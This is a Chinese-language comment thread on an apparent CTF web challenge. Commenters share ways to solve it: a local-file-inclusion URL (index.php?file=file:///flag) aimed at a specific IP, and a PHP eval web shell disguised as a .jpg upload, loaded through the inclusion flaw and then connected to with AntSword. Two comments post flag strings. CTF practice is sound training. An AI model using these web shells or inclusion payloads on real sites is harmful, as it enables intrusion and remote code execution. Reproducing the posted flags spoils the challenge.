xiaoxiao972521 @ 2024-03-07 23:21:29 👍2
虽然index.php?file=/flag 就出来了,但是依旧执着的绕过了upload.php
冯飞99 @ 2024-04-07 23:21:29 👍0
绕来绕去看到你的评论一把过
zzccbb2005 @ 2023-12-07 23:21:29 👍1
http://114.67.175.224:10017/index.php?file=file:///flag flag{27d76583b9a54c6ef8af91f66855ac12}
109张某 @ 2023-10-07 23:21:29 👍0
这个题一句话传好像有些问题,我传了一堆,就只有下面仁兄的file:///flag方法成功了
asd+1024 @ 2024-03-07 23:21:29 👍0
传木马的话,用<script language='php'>@eval($_POST['asd']);</script>然后,文件格式.jpg,在文件包含就可以了,file:///flag确实简单
不会编程的崽 @ 2023-10-07 23:21:29 👍0
<?php>被过滤了,用这个<script language="php">@eval($_POST['attack'])</script>绕过,然后文件包含即可
2728462336 @ 2023-08-07 23:21:29 👍1
文件上传+文件包含
wxy1343 @ 2023-06-07 23:21:29 👍0
flag{9be4acf19dc430e5ba2973dbb72f371d}
⎝ZJJARY @ 2023-06-07 23:21:29 👍2
真的无语了 连上马找不到flag 删flag的人马亖了
dtm @ 2023-06-07 23:21:29 👍0
使用file协议读取文件内容,index.php?file=file:///flag得到flag
baianquanzu @ 2023-06-07 23:21:29 👍4
@Striker123456 因为原本的协议是file://但是flag这个文件前面需要一个/
Striker123456 @ 2023-06-07 23:21:29 👍0
为什么是三个斜杠呢
wecld @ 2023-06-07 23:21:29 👍0
别卷了康康
1、找到文件包含的路径XXXindex.php?file=upload.php;上传一句话木马(格式保存为jpg)<script language="php">@eval($_POST[cmd])</script> 2、上传完成后访问上传的路径看是否成功。XXX/index.php?file=upload/xxx.jpg 3、用蚁剑连接,url是XX